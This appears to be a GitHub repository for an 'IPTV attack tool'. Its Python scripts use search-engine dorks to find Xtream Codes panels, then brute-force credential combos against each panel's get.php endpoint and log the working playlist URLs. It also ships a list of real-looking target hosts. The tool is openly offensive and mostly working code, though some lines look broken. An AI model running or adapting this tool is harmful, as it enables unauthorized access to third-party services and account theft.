├── .github ├── FUNDING.yml └── workflows │ ├── codeql-analysis.yml │ ├── pylint.yml │ └── semgrep.yml ├── .pylintrc ├── CONTRIBUTING.md ├── README.md ├── cracker.py ├── dork_list.txt ├── gather_urls.py ├── iptv.py ├── requirements.txt ├── urls.txt └── users.txt /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 13 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 14 | custom: https://www.paypal.me/KristBegaj 15 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # For most projects, this workflow file will not need changing; you simply need 2 | # to commit it to your repository. 3 | # 4 | # You may wish to alter this file to override the set of languages analyzed, 5 | # or to provide custom queries or build logic. 6 | # 7 | # ******** NOTE ******** 8 | # We have attempted to detect the languages in your repository. Please check 9 | # the `language` matrix defined below to confirm you have the correct set of 10 | # supported CodeQL languages. 11 | # 12 | name: "CodeQL" 13 | 14 | on: 15 | push: 16 | branches: [ master ] 17 | pull_request: 18 | # The branches below must be a subset of the branches above 19 | branches: [ master ] 20 | schedule: 21 | - cron: '22 14 * * 6' 22 | 23 | jobs: 24 | analyze: 25 | name: Analyze 26 | runs-on: ubuntu-latest 27 | permissions: 28 | actions: read 29 | contents: read 30 | security-events: write 31 | 32 | strategy: 33 | fail-fast: false 34 | matrix: 35 | language: [ 'python' ] 36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] 37 | # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support 38 | 39 | steps: 40 | - name: Checkout repository 41 | uses: actions/checkout@v3 42 | 43 | # Initializes the CodeQL tools for scanning. 44 | - name: Initialize CodeQL 45 | uses: github/codeql-action/init@v2 46 | with: 47 | languages: ${{ matrix.language }} 48 | # If you wish to specify custom queries, you can do so here or in a config file. 49 | # By default, queries listed here will override any specified in a config file. 50 | # Prefix the list here with "+" to use these queries and those in the config file. 51 | 52 | # Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs 53 | # queries: security-extended,security-and-quality 54 | 55 | 56 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). 57 | # If this step fails, then you should remove it and run the build manually (see below) 58 | - name: Autobuild 59 | uses: github/codeql-action/autobuild@v2 60 | 61 | # ℹ️ Command-line programs to run using the OS shell. 62 | # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun 63 | 64 | # If the Autobuild fails above, remove it and uncomment the following three lines. 65 | # modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance. 66 | 67 | # - run: | 68 | # echo "Run, Build Application using script" 69 | # ./location_of_script_within_repo/buildscript.sh 70 | 71 | - name: Perform CodeQL Analysis 72 | uses: github/codeql-action/analyze@v2 73 | -------------------------------------------------------------------------------- /.github/workflows/pylint.yml: -------------------------------------------------------------------------------- 1 | name: Pylint 2 | 3 | on: [push] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | strategy: 9 | matrix: 10 | python-version: ["3.10"] 11 | steps: 12 | - uses: actions/checkout@v3 13 | - name: Set up Python ${{ matrix.python-version }} 14 | uses: actions/setup-python@v3 15 | with: 16 | python-version: ${{ matrix.python-version }} 17 | - name: Install dependencies 18 | run: | 19 | python -m pip install --upgrade pip 20 | pip install -r requirements.txt 21 | pip install pylint 22 | - name: Analysing the code with pylint 23 | run: | 24 | pylint iptv.py 25 | -------------------------------------------------------------------------------- /.github/workflows/semgrep.yml: -------------------------------------------------------------------------------- 1 | on: 2 | pull_request: {} 3 | push: 4 | branches: 5 | - master 6 | paths: 7 | - .github/workflows/semgrep.yml 8 | schedule: 9 | - cron: '0 0 * * 0' 10 | name: Semgrep 11 | jobs: 12 | semgrep: 13 | name: Scan 14 | runs-on: ubuntu-20.04 15 | env: 16 | SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }} 17 | container: 18 | image: returntocorp/semgrep 19 | steps: 20 | - uses: actions/checkout@v3 21 | - run: semgrep ci 22 | -------------------------------------------------------------------------------- /.pylintrc: -------------------------------------------------------------------------------- 1 | [Master] 2 | disable=import-error -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributors of the project! 2 | [0x08](https://github.com/its0x08) 3 | 4 | 5 | ### Make sure to add your self on this list before commiting 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IPTV-tool v0.0.1-beta 2 | IPTV bruteforce tool. 3 | 4 | ![Visitors](https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fits0x08%2FIPTV-tool&countColor=%232ccce4&style=flat-square) 5 | [![Semgrep](https://github.com/its0x08/IPTV-tool/actions/workflows/semgrep.yml/badge.svg?branch=master)](https://github.com/its0x08/IPTV-tool/actions/workflows/semgrep.yml) 6 | [![Pylint](https://github.com/its0x08/IPTV-tool/actions/workflows/pylint.yml/badge.svg?branch=master)](https://github.com/its0x08/IPTV-tool/actions/workflows/pylint.yml) 7 | -------------------------------------------------------------------------------- /cracker.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """Cracker file""" 3 | from sys import argv 4 | 5 | from requests import get 6 | from requests.exceptions import HTTPError 7 | 8 | 9 | def brute_accounts(panels_url, combo_file): 10 | """Bruteforce function""" 11 | for user in open(combo_file, 'r', encoding="utf-8").readlines(): 12 | print(f"[i] Trying combo: {user.strip()}") 13 | for url in open(panels_url, "r", encoding="utf-8").readlines(): 14 | try: 15 | account_to_try = f"http://{url.strip()}/get.php?\ 16 | username={user.strip()}&password={user.strip()}&type=m3u&output=ts" 17 | if "#EXTINF:0" in get(account_to_try, timeout=15, stream=True).text: 18 | print(f"[+] Playlist URL found: {account_to_try}") 19 | with open("logs.txt", "a+", encoding="utf-8") as log_file: 20 | log_file.write(f"{account_to_try}\n") 21 | log_file.close() 22 | except HTTPError as http_error: 23 | print(http_error) 24 | 25 | if __name__ == '__main__': 26 | try: 27 | url_list = argv[1] 28 | comboFile = argv[2] 29 | print(f"[+] Loaded {len(open(url_list, 'r', encoding='utf-8').readlines())} URL_list!") 30 | brute_accounts(url_list, comboFile) 31 | except HTTPError as http_err: 32 | print(http_err) 33 | -------------------------------------------------------------------------------- /dork_list.txt: -------------------------------------------------------------------------------- 1 | site:org intext:Xtream Codes v1.0.59.5 2 | site:com intext:Xtream Codes v1.0.59.5 3 | site:net intext:Xtream Codes v1.0.59.5 4 | site:dynamic-dns.net intext:Xtream Codes v1.0.59.5 5 | site:dns04.con intext:Xtream Codes v1.0.59.5 6 | site:zapto.org intext:Xtream Codes v1.0.59.5 7 | site:hopto.org intext:Xtream Codes v1.0.59.5 8 | site:ddns.net intext:Xtream Codes v1.0.59.5 9 | site:dyndns.org intext: Xtream Codes v1.0.59.5 10 | site:sytes.net intext: Xtream Codes v1.0.59.5 -------------------------------------------------------------------------------- /gather_urls.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """Scrapping module""" 3 | from sys import argv 4 | 5 | from duckduckgo import search 6 | from requests import get 7 | from requests.exceptions import HTTPError 8 | from urlparse import urlparse 9 | 10 | 11 | def extract_urls(dork_file): 12 | """Extractor function""" 13 | temp = [] 14 | with open(dork_file, "r", encoding="utf8").readlines() as dorks_file: 15 | for dork in dorks_file: 16 | for link in search(dork.strip(), max_results=400): 17 | if link not in temp: 18 | temp.append(link) 19 | return temp 20 | 21 | def check_urls(urls): 22 | """URL checker function""" 23 | temp = [] 24 | for url in urls: 25 | url = urlparse(url.strip())[1] 26 | if url not in temp: 27 | temp.append(url) 28 | print(f"[i] Found {len(temp)} in total.") 29 | return temp 30 | 31 | 32 | def alive_or_not(urls): 33 | """Availability checker""" 34 | temp = [] 35 | print("[*] Hunting URLs for Admin panel") 36 | for url in urls: 37 | try: 38 | if "Xtream Codes" in get(f"http://{url}/", timeout=10).text: 39 | print(f"\t{len(temp+1)} Panel found on URL -->> http://{url}/") 40 | temp.append(url) 41 | except HTTPError as not_iptv: 42 | print(not_iptv) 43 | print(f"[i] {len(temp)} of them are alive!") 44 | with open("urls.txt", "a+", encoding="utf-8") as url_file: 45 | for url in temp: 46 | url_file.write(f"http://{url}/\n") 47 | url_file.close() 48 | 49 | if __name__ == '__main__': 50 | try: 51 | dorks = argv[1] 52 | alive_or_not(check_urls(extract_urls(dorks))) 53 | except HTTPError as err: 54 | print(err) 55 | -------------------------------------------------------------------------------- /iptv.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """IPTV attack tool""" 3 | from sys import argv 4 | from urllib.parse import urlparse 5 | 6 | from duckduckgo import search 7 | from requests import get 8 | from requests.exceptions import HTTPError 9 | 10 | 11 | def banner(): 12 | """Banner function""" 13 | return """ 14 | IPTV attack tool. 15 | 16 | """ 17 | 18 | def usage(): 19 | """Usage method""" 20 | banner() 21 | print(f"Usage:\n\tpython {argv[0]} dorkFile.txt comboFile.txt\n") 22 | 23 | def extract_urls(dorks_list): 24 | """URL extractor fuction""" 25 | temp = [] 26 | with open(dorks_list, 'r', encoding="utf-8").readlines() as dork_lines: 27 | for dork in dork_lines: 28 | for link in search(dork.strip(), max_results=400): 29 | if link not in temp: 30 | temp.append(link) 31 | return temp 32 | 33 | def check_urls(urls): 34 | """URL checker function""" 35 | temp = [] 36 | for url in urls: 37 | url = urlparse(url.strip())[1] 38 | if url not in temp: 39 | temp.append(url) 40 | print(f"[i] Found {len(temp)} in total.") 41 | return temp 42 | 43 | def alive_or_not(urls): 44 | """Availability check funcsion""" 45 | temp = [] 46 | print("[*] Hunting URLs for Admin panel") 47 | for url in urls: 48 | try: 49 | if "Xtream Codes" in get(f"http://{url}/", timeout=10).text: 50 | print(f"\tPanel found on URL -->> http://{url}/") 51 | temp.append(url) 52 | except HTTPError as http_error: 53 | print(http_error) 54 | print(f"[i] {len(temp)} of them are alive!") 55 | return temp 56 | 57 | def brute_accounts(urls,combos_file): 58 | """Bruteforcing function""" 59 | with open(combos_file, 'r', encoding="utf-8").readlines() as user_lines: 60 | for user in user_lines: 61 | print(f"[i] Trying combo: {user.strip()}") 62 | for url in urls: 63 | try: 64 | account_to_try = f"http://{url.strip()}\ 65 | /get.php?username={user.strip()}&password={user.strip()}&type=m3u&output=ts" 66 | if "#EXTINF:0" in get(account_to_try, timeout=15, stream=True).text: 67 | print(f"[+] Playlist URL found: {account_to_try}") 68 | with open("logs.txt", "a", encoding="utf-8") as logs_file: 69 | logs_file.write(f"{account_to_try}\n") 70 | logs_file.close() 71 | except HTTPError as http_error: 72 | print(http_error) 73 | 74 | if __name__ == '__main__': 75 | try: 76 | usage() 77 | dorks = argv[1] 78 | combo_file = argv[2] 79 | brute_accounts(alive_or_not(check_urls(extract_urls(dorks))), combo_file) 80 | except KeyboardInterrupt as e: 81 | print(e) 82 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | #git+https://github.com/its0x08/duckduckgo 3 | urlparse3 -------------------------------------------------------------------------------- /urls.txt: -------------------------------------------------------------------------------- 1 | http://1iptv.dyndns.org:7000/ 2 | http://blindex.zapto.org:8000/ 3 | http://buritv.ddns.net:8000/ 4 | http://cccamsat.ddns.net:8000/ 5 | http://clubeiptv.ddns.net:8444/ 6 | http://dgnetworks1.dyndns.org:8000/ 7 | http://digitalrevolution.ddns.net:8080/ 8 | http://haldunxtream.hopto.org:8060/ 9 | http://ipglobemain1.ddns.net:8000/ 10 | http://ippo.zapto.org:8000/ 11 | http://iptv4.ddns.net:8000/ 12 | http://iptveo.ddns.net:11071/ 13 | http://iptv-world2.ddns.net:8000/ 14 | http://jurbas.ddns.net:8050/ 15 | http://kiptv3.ddns.net:8000/ 16 | http://misterxiptv2.ddns.net:8000/ 17 | http://nuevohost.dyndns.org:8000/ 18 | http://piromery97.zapto.org:9000/ 19 | http://powertv5.dyndns.org:24715/ 20 | http://protokoll.dyndns.org:15001/ 21 | http://santaader.zapto.org:9100/ 22 | http://sentatv2.zapto.org:6600/ 23 | http://sentatv.zapto.org:22000/ 24 | http://servuk.ddns.net:8000/ 25 | http://tvpanonica.ddns.net:8000/ 26 | http://wweraw.zapto.org:8080/ 27 | --------------------------------------------------------------------------------